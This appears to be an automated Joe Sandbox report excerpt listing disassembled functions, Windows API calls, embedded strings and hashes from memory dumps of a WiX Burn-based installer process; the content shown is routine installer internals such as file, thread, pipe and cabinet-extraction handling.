                                                                                                                • Failed to read variable included flag., xrefs: 009A71AE
                                                                                                                • Failed to read variable name., xrefs: 009A71A7
                                                                                                                • Failed to read variable value as number., xrefs: 009A7178
                                                                                                                • Failed to set variable., xrefs: 009A7192
                                                                                                                • Failed to read variable value type., xrefs: 009A71A0
                                                                                                                • Failed to set variable value., xrefs: 009A7171
                                                                                                                • Unsupported variable type., xrefs: 009A7184
                                                                                                                • Failed to read variable literal flag., xrefs: 009A7199
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                • API String ID: 3168844106-528957463
                                                                                                                • Opcode ID: 9c86a80c4ab93e77ca430550cd14b0cbf1e539cc803266f3968d94096b268a90
                                                                                                                • Instruction ID: d7c150664699f8fbccca5d7c7985e5a56716f3c19b2126ab64e426b2a5328325
                                                                                                                • Opcode Fuzzy Hash: 9c86a80c4ab93e77ca430550cd14b0cbf1e539cc803266f3968d94096b268a90
                                                                                                                • Instruction Fuzzy Hash: 4471AE31C0925EAFCF12DAE4CC46FAEBBB9EB86714F104526F900A6250D6349E109BE0
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 009E4550
                                                                                                                • GetLastError.KERNEL32 ref: 009E4566
                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 009E45BF
                                                                                                                • GetLastError.KERNEL32 ref: 009E45C9
                                                                                                                • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 009E461D
                                                                                                                • GetLastError.KERNEL32 ref: 009E4628
                                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 009E4717
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009E478A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 3286166115-2967768451
                                                                                                                • Opcode ID: bfed8db76f517fac59576bb780bfd35f2858fac7d0959d98c3c8020aa91abcb6
                                                                                                                • Instruction ID: d31bc608844eaa36bcb9358141766b7b0159baa0f27ec1cc09684a90df75e3f3
                                                                                                                • Opcode Fuzzy Hash: bfed8db76f517fac59576bb780bfd35f2858fac7d0959d98c3c8020aa91abcb6
                                                                                                                • Instruction Fuzzy Hash: 3B812932A402A6EBDB238E5B8C45B7F769CAF41B60F114529FD15EF290DB74DD009AD0
                                                                                                                APIs
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 009A30C1
                                                                                                                • GetLastError.KERNEL32 ref: 009A30C7
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 009A3121
                                                                                                                • GetLastError.KERNEL32 ref: 009A3127
                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A31DB
                                                                                                                • GetLastError.KERNEL32 ref: 009A31E5
                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 009A323B
                                                                                                                • GetLastError.KERNEL32 ref: 009A3245
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                • String ID: @$pathutil.cpp
                                                                                                                • API String ID: 1547313835-3022285739
                                                                                                                • Opcode ID: bee857a81915e1ae67f378fed9c2461e630ce3be55b913285ce2a76ef9fb5763
                                                                                                                • Instruction ID: 4d63da505c71512b5ef9465e13427937691e12c40e5751595642e379b06a6227
                                                                                                                • Opcode Fuzzy Hash: bee857a81915e1ae67f378fed9c2461e630ce3be55b913285ce2a76ef9fb5763
                                                                                                                • Instruction Fuzzy Hash: AD61C473D04229ABDB219AE58C44B9EBBA8AF46764F11C165FE10BB150E735DF009BD0
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74DEDFD0,?,009E72C8,?,?), ref: 009E6DA6
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E6E11
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E6E89
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E6EC8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Free$Compare
                                                                                                                • String ID: `<u$label$scheme$term
                                                                                                                • API String ID: 1324494773-4028212031
                                                                                                                • Opcode ID: 75c5202d90acd71e1a1ab4778726ea82afc7442599ae0333525fa1a85449b6cc
                                                                                                                • Instruction ID: 6727394f2c346ee54a6a845a0e734c0c04c410724278e382e929744889079a5a
                                                                                                                • Opcode Fuzzy Hash: 75c5202d90acd71e1a1ab4778726ea82afc7442599ae0333525fa1a85449b6cc
                                                                                                                • Instruction Fuzzy Hash: 94518E35901259FBCB26CB95CC49FAEBBB8EF14361F2042A8E521AB1E1D7309E50DB50
                                                                                                                APIs
                                                                                                                • UuidCreate.RPCRT4(?), ref: 009B4DC0
                                                                                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 009B4DEF
                                                                                                                • UuidCreate.RPCRT4(?), ref: 009B4E3A
                                                                                                                • StringFromGUID2.OLE32(?,?,00000027), ref: 009B4E66
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromStringUuid
                                                                                                                • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                • API String ID: 4041566446-2510341293
                                                                                                                • Opcode ID: f987536376073e0291669e14449a27ee9a8d14f40ea36cf8852b747f433cb626
                                                                                                                • Instruction ID: 9a96bc3c4b5aa65834502e08dd90025dc319c3c1fa4cab8ea99ce3a03dd78421
                                                                                                                • Opcode Fuzzy Hash: f987536376073e0291669e14449a27ee9a8d14f40ea36cf8852b747f433cb626
                                                                                                                • Instruction Fuzzy Hash: 2A418C32D0430CABCB11DBE5CE45FEEB7FCAB84720F200526F905AB242D6749945DB90
                                                                                                                APIs
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,009A548E,?,?), ref: 009BEA9D
                                                                                                                • GetLastError.KERNEL32(?,009A548E,?,?), ref: 009BEAAA
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,009BE7B4,?,00000000,00000000), ref: 009BEB03
                                                                                                                • GetLastError.KERNEL32(?,009A548E,?,?), ref: 009BEB10
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,009A548E,?,?), ref: 009BEB4B
                                                                                                                • CloseHandle.KERNEL32(00000000,?,009A548E,?,?), ref: 009BEB6A
                                                                                                                • CloseHandle.KERNEL32(?,?,009A548E,?,?), ref: 009BEB77
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                • API String ID: 2351989216-3599963359
                                                                                                                • Opcode ID: f9637fd7754a8d2b111dd02218937979fb03afddc252375a0d58d552df83e6ac
                                                                                                                • Instruction ID: d4431dde3950e3f1d43dd32fcd27d0e38860f2b3ec220adfe52e5efc324b4cb5
                                                                                                                • Opcode Fuzzy Hash: f9637fd7754a8d2b111dd02218937979fb03afddc252375a0d58d552df83e6ac
                                                                                                                • Instruction Fuzzy Hash: ED319476D01229BBDB10DFD99D85AEFBABCFF04360F110165BA14F7240E6309E0096A0
                                                                                                                APIs
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,009A548E,?,?), ref: 009BE666
                                                                                                                • GetLastError.KERNEL32(?,?,009A548E,?,?), ref: 009BE673
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,009BE3C8,00000000,00000000,00000000), ref: 009BE6D2
                                                                                                                • GetLastError.KERNEL32(?,?,009A548E,?,?), ref: 009BE6DF
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,009A548E,?,?), ref: 009BE71A
                                                                                                                • CloseHandle.KERNEL32(?,?,?,009A548E,?,?), ref: 009BE72E
                                                                                                                • CloseHandle.KERNEL32(?,?,?,009A548E,?,?), ref: 009BE73B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                • API String ID: 2351989216-1977201954
                                                                                                                • Opcode ID: 867ad5a0039f3bff649b6726c0c724e1ad6f960e118d2ec8e5cf1fa4b6a4eb1a
                                                                                                                • Instruction ID: dcf297cbb03d5ff67c49d86676adaacb140dcb33ee3025cf18de9cd73179fc80
                                                                                                                • Opcode Fuzzy Hash: 867ad5a0039f3bff649b6726c0c724e1ad6f960e118d2ec8e5cf1fa4b6a4eb1a
                                                                                                                • Instruction Fuzzy Hash: 22317476D0022ABBDB219B99CD45AEFBBBCAF94720F114156FE20F6250E7745E008AD1
                                                                                                                APIs
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,009A5405,009A53BD,00000000,009A5445), ref: 009C1506
                                                                                                                • GetLastError.KERNEL32 ref: 009C1519
                                                                                                                • GetExitCodeThread.KERNEL32(009EB488,?), ref: 009C155B
                                                                                                                • GetLastError.KERNEL32 ref: 009C1569
                                                                                                                • ResetEvent.KERNEL32(009EB460), ref: 009C15A4
                                                                                                                • GetLastError.KERNEL32 ref: 009C15AE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                • API String ID: 2979751695-3400260300
                                                                                                                • Opcode ID: 735b37e4bc2ef5da75267bb378c8a98a87937e353b73eb8d8c64b713af50db36
                                                                                                                • Instruction ID: 28bd151aba3abee038bd79852fbbec2bfb11a2aed94587c1e857a70a1617ce1b
                                                                                                                • Opcode Fuzzy Hash: 735b37e4bc2ef5da75267bb378c8a98a87937e353b73eb8d8c64b713af50db36
                                                                                                                • Instruction Fuzzy Hash: AA31A7B0E40245ABD7109FA98D41B7F76E8EF85710B10406AFA15DA261E774DE00AB56
                                                                                                                APIs
                                                                                                                • SetEvent.KERNEL32(009EB478,?,00000000,?,009AC1D3,?,009A53BD,00000000,?,009B784D,?,009A566D,009A5479,009A5479,00000000,?), ref: 009C161B
                                                                                                                • GetLastError.KERNEL32(?,009AC1D3,?,009A53BD,00000000,?,009B784D,?,009A566D,009A5479,009A5479,00000000,?,009A5489,FFF9E89D,009A5489), ref: 009C1625
                                                                                                                • WaitForSingleObject.KERNEL32(009EB488,000000FF,?,009AC1D3,?,009A53BD,00000000,?,009B784D,?,009A566D,009A5479,009A5479,00000000,?,009A5489), ref: 009C165F
                                                                                                                • GetLastError.KERNEL32(?,009AC1D3,?,009A53BD,00000000,?,009B784D,?,009A566D,009A5479,009A5479,00000000,?,009A5489,FFF9E89D,009A5489), ref: 009C1669
                                                                                                                • CloseHandle.KERNEL32(00000000,009A5489,?,00000000,?,009AC1D3,?,009A53BD,00000000,?,009B784D,?,009A566D,009A5479,009A5479,00000000), ref: 009C16B4
                                                                                                                • CloseHandle.KERNEL32(00000000,009A5489,?,00000000,?,009AC1D3,?,009A53BD,00000000,?,009B784D,?,009A566D,009A5479,009A5479,00000000), ref: 009C16C3
                                                                                                                • CloseHandle.KERNEL32(00000000,009A5489,?,00000000,?,009AC1D3,?,009A53BD,00000000,?,009B784D,?,009A566D,009A5479,009A5479,00000000), ref: 009C16D2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                • API String ID: 1206859064-226982402
                                                                                                                • Opcode ID: dc0a39f1bca7f6a5f51586874cd968be834ec3f4bd0d28a2c6c3d1f365040a28
                                                                                                                • Instruction ID: eb9efe21f85d22d9c84f710a06ff29f40865d25eb988e3294dbd685de90d5385
                                                                                                                • Opcode Fuzzy Hash: dc0a39f1bca7f6a5f51586874cd968be834ec3f4bd0d28a2c6c3d1f365040a28
                                                                                                                • Instruction Fuzzy Hash: 50216B33900A22B7D7315B55CD09F16B6A8BF09735F050229FA0865AA1D374FC60DBDE
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0523: EnterCriticalSection.KERNEL32(00A0B5FC,00000000,?,?,?,009B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009A54FA,?), ref: 009E0533
                                                                                                                  • Part of subcall function 009E0523: LeaveCriticalSection.KERNEL32(00A0B5FC,?,?,00A0B5F4,?,009B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009A54FA,?), ref: 009E067A
                                                                                                                • OpenEventLogW.ADVAPI32(00000000,Application), ref: 009B4212
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 009B421E
                                                                                                                • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,009F39D4,00000000), ref: 009B426B
                                                                                                                • CloseEventLog.ADVAPI32(00000000), ref: 009B4272
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                • API String ID: 1844635321-1389066741
                                                                                                                • Opcode ID: 4a0c8b69e37d90125cc1502663eca31921e3ce6fe538557d6bb2e62f967a9cce
                                                                                                                • Instruction ID: c3531cc63fa35908c37cbeb6eef4930d7d89670c8130d669ae76d360dd59f465
                                                                                                                • Opcode Fuzzy Hash: 4a0c8b69e37d90125cc1502663eca31921e3ce6fe538557d6bb2e62f967a9cce
                                                                                                                • Instruction Fuzzy Hash: 16F0F433A812B57A563222A35D1EEBF2C6CDAC6F3A3014015BE20F5182DB489D01A2F4
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 009B949E
                                                                                                                • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 009B94C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                • API String ID: 1452528299-4263581490
                                                                                                                • Opcode ID: 15222928f2698394a9563edf6e65c37d8e1269a5130508e68a3435d2a41a3be2
                                                                                                                • Instruction ID: efd9e12065ae248d8e2d79d33369bd0b71afa69dff62bef51095d882b1112d7e
                                                                                                                • Opcode Fuzzy Hash: 15222928f2698394a9563edf6e65c37d8e1269a5130508e68a3435d2a41a3be2
                                                                                                                • Instruction Fuzzy Hash: 35718272D5022DABDB21DFD4C941BEEB7B8AB49720F114126FE15FB291E7749D008BA0
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 009BE577
                                                                                                                • DefWindowProcW.USER32(?,00000082,?,?), ref: 009BE5B5
                                                                                                                • SetWindowLongW.USER32(?,000000EB,00000000), ref: 009BE5C2
                                                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 009BE5D1
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 009BE5DF
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 009BE5EB
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 009BE5FC
                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 009BE61E
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 009BE626
                                                                                                                • DeleteDC.GDI32(00000000), ref: 009BE629
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 009BE637
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                • String ID:
                                                                                                                • API String ID: 409979828-0
                                                                                                                • Opcode ID: 5ca100b62317065778e2844381955d17fbb8f0909d02e11a7fdfb68ffbfc01be
                                                                                                                • Instruction ID: 07807f7039a23b13e60846053325d747f0f16f70782ac9e588e6416f41dd1986
                                                                                                                • Opcode Fuzzy Hash: 5ca100b62317065778e2844381955d17fbb8f0909d02e11a7fdfb68ffbfc01be
                                                                                                                • Instruction Fuzzy Hash: 8F21A932118248BFCB269F68DD9DDBB3FACEF49321B054618F6168A1B4D7719C10EB60
                                                                                                                Strings
                                                                                                                • Failed to combine last source with source., xrefs: 009BA210
                                                                                                                • Failed to combine layout source with source., xrefs: 009BA2A4
                                                                                                                • WixBundleLastUsedSource, xrefs: 009BA1A1
                                                                                                                • Failed to copy source path., xrefs: 009BA31A
                                                                                                                • Failed to get bundle layout directory property., xrefs: 009BA287
                                                                                                                • Failed to get current process directory., xrefs: 009BA1F3
                                                                                                                • WixBundleLayoutDirectory, xrefs: 009BA26C
                                                                                                                • WixBundleOriginalSource, xrefs: 009BA1B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirstlstrlen
                                                                                                                • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                • API String ID: 2767606509-3003062821
                                                                                                                • Opcode ID: a4fac4a1baec6aa7abef7590627d67ef7b418ec64f0a3451b6777cf39d141b50
                                                                                                                • Instruction ID: d7a2b01fa9bb07834c89d25d75b0dae5759c3080110f49c00ab13b8df5fea019
                                                                                                                • Opcode Fuzzy Hash: a4fac4a1baec6aa7abef7590627d67ef7b418ec64f0a3451b6777cf39d141b50
                                                                                                                • Instruction Fuzzy Hash: B0717A71D0421DAFCF16DFA8C941AEEB7F9AF48720F110129F911B7260E7759D408BA2
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 009A2E5F
                                                                                                                • GetLastError.KERNEL32 ref: 009A2E69
                                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 009A2F09
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 009A2F96
                                                                                                                • GetLastError.KERNEL32 ref: 009A2FA3
                                                                                                                • Sleep.KERNEL32(00000064), ref: 009A2FB7
                                                                                                                • CloseHandle.KERNEL32(?), ref: 009A301F
                                                                                                                Strings
                                                                                                                • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 009A2F66
                                                                                                                • pathutil.cpp, xrefs: 009A2E8D
                                                                                                                Memory Dump Source
